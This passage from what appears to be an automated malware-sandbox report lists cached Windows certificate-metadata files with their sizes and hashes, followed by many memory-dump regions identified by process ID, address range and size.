SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506Filesize
330B
MD5cedd51ac8abf70a3af162ffbc14c4d6c
SHA195fca6970bd8a31383db18d1df40c22a9ff82e11
SHA2562e5ea1a87f5b9e79be39e764abbcae49e0871791a4e8fef52941ed9db4acb05e
SHA5124a1a164b66434328a34a7ca89ead6203533baf05cfa636711776980d89c94c3bd0fc61911866917d32caf8c759e8f10bdb4c41c5e4a68596264cb943656c5ac4
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749Filesize
330B
MD5792bffe1f265f050a58de6665d84d8f4
SHA18d87c260e5065a8c4ab40233da6a64b7bdb67c6a
SHA256d48326a9b743786d412d743737447c6be9d41489b899450d128d73ac33484054
SHA512a0a204e9790735d6b72368198de9ea362853ad287bd014c466a1fdfb3e9099f664ce9e8bf6c2de07aeb9351542b91fe3c91885b2dd7e312321c7592f7d5d68bc
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64AFilesize
412B
MD5935b9046d68dacf26428b32dd5d143e4
SHA18ee6bcefbabfd7bbaee62e0ce788f050c0d9a98a
SHA2563b4ea7806a7012d3e42bd361e7d19dd8749a3a4c7b657711bbb4e29c49ddf08f
SHA51253b2c00cdf858e12b34496a6f8fad4233058e528992461d2fb2ece9097c4910043faa9c8df2756fefbee0fff4cbb576bf5e050dda8fdbf61e140cb70bd04aa7f
-
memory/316-122-0x00007FF85CD90000-0x00007FF85CDA0000-memory.dmpFilesize
64KB
-
memory/316-115-0x000001A5F2480000-0x000001A5F24AB000-memory.dmpFilesize
172KB
-
memory/316-121-0x000001A5F2480000-0x000001A5F24AB000-memory.dmpFilesize
172KB
-
memory/428-126-0x000001604EE90000-0x000001604EEBB000-memory.dmpFilesize
172KB
-
memory/616-81-0x000001B00FCE0000-0x000001B00FD0B000-memory.dmpFilesize
172KB
-
memory/616-82-0x000001B00FCE0000-0x000001B00FD0B000-memory.dmpFilesize
172KB
-
memory/616-89-0x00007FF85CD90000-0x00007FF85CDA0000-memory.dmpFilesize
64KB
-
memory/616-88-0x000001B00FCE0000-0x000001B00FD0B000-memory.dmpFilesize
172KB
-
memory/616-80-0x000001B00F8B0000-0x000001B00F8D5000-memory.dmpFilesize
148KB
-
memory/672-93-0x00000156FCCD0000-0x00000156FCCFB000-memory.dmpFilesize
172KB
-
memory/672-100-0x00007FF85CD90000-0x00007FF85CDA0000-memory.dmpFilesize
64KB
-
memory/672-99-0x00000156FCCD0000-0x00000156FCCFB000-memory.dmpFilesize
172KB
-
memory/960-104-0x000001EE09700000-0x000001EE0972B000-memory.dmpFilesize
172KB
-
memory/960-111-0x00007FF85CD90000-0x00007FF85CDA0000-memory.dmpFilesize
64KB
-
memory/960-110-0x000001EE09700000-0x000001EE0972B000-memory.dmpFilesize
172KB
-
memory/1468-63-0x000001F47A370000-0x000001F47A392000-memory.dmpFilesize
136KB
-
memory/1468-64-0x000001F47A3E0000-0x000001F47A40A000-memory.dmpFilesize
168KB
-
memory/1468-65-0x00007FF89CD10000-0x00007FF89CF05000-memory.dmpFilesize
2.0MB
-
memory/1468-66-0x00007FF89BDE0000-0x00007FF89BE9E000-memory.dmpFilesize
760KB
-
memory/1572-70-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1572-69-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1572-67-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1572-72-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1572-76-0x00007FF89BDE0000-0x00007FF89BE9E000-memory.dmpFilesize
760KB
-
memory/1572-75-0x00007FF89CD10000-0x00007FF89CF05000-memory.dmpFilesize
2.0MB
-
memory/1572-77-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1572-68-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3784-898-0x0000000074A60000-0x0000000075210000-memory.dmpFilesize
7.7MB
-
memory/3784-57-0x0000000007A50000-0x0000000007AC6000-memory.dmpFilesize
472KB
-
memory/3784-52-0x0000000006A80000-0x0000000006AC4000-memory.dmpFilesize
272KB
-
memory/3784-33-0x0000000074A60000-0x0000000075210000-memory.dmpFilesize
7.7MB
-
memory/3784-35-0x0000000074A60000-0x0000000075210000-memory.dmpFilesize
7.7MB
-
memory/3784-34-0x0000000074A60000-0x0000000075210000-memory.dmpFilesize
7.7MB
-
memory/4864-26-0x00000000072A0000-0x0000000007332000-memory.dmpFilesize
584KB
-
memory/4864-18-0x0000000005F00000-0x0000000005F1E000-memory.dmpFilesize
120KB
-
memory/4864-27-0x00000000073A0000-0x00000000073B2000-memory.dmpFilesize
72KB
-
memory/4864-51-0x0000000074A60000-0x0000000075210000-memory.dmpFilesize
7.7MB
-
memory/4864-25-0x0000000008380000-0x0000000008924000-memory.dmpFilesize
5.6MB
-
memory/4864-24-0x0000000007140000-0x00000000071AC000-memory.dmpFilesize
432KB
-
memory/4864-23-0x0000000007100000-0x000000000713E000-memory.dmpFilesize
248KB
-
memory/4864-22-0x00000000064E0000-0x00000000064E8000-memory.dmpFilesize
32KB
-
memory/4864-21-0x00000000064A0000-0x00000000064BA000-memory.dmpFilesize
104KB
-
memory/4864-20-0x0000000007750000-0x0000000007DCA000-memory.dmpFilesize
6.5MB
-
memory/4864-19-0x0000000005F90000-0x0000000005FDC000-memory.dmpFilesize
304KB
-
memory/4864-28-0x0000000007710000-0x000000000774C000-memory.dmpFilesize
240KB
-
memory/4864-13-0x0000000005AA0000-0x0000000005DF4000-memory.dmpFilesize
3.3MB
-
memory/4864-0-0x0000000074A6E000-0x0000000074A6F000-memory.dmpFilesize
4KB
-
memory/4864-6-0x00000000052D0000-0x0000000005336000-memory.dmpFilesize
408KB
-
memory/4864-9-0x0000000005A30000-0x0000000005A96000-memory.dmpFilesize
408KB
-
memory/4864-5-0x00000000050B0000-0x00000000050D2000-memory.dmpFilesize
136KB
-
memory/4864-2-0x0000000074A60000-0x0000000075210000-memory.dmpFilesize
7.7MB
-
memory/4864-4-0x0000000074A60000-0x0000000075210000-memory.dmpFilesize
7.7MB
-
memory/4864-3-0x0000000005400000-0x0000000005A28000-memory.dmpFilesize
6.2MB
-
memory/4864-1-0x0000000002A10000-0x0000000002A46000-memory.dmpFilesize
216KB